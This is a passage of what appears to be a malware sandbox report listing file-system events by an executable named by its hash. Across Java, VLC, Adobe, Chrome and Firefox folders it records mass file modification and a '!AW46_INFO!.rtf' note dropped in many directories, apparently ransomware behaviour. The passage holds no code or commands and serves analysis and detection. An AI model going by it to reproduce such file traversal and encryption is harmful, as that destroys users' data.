9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Graph.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\StartUndo.vsdx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ml.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\kn.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\bin\server\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\SuspendDeny.mpp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\vi.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bg.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pl.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro 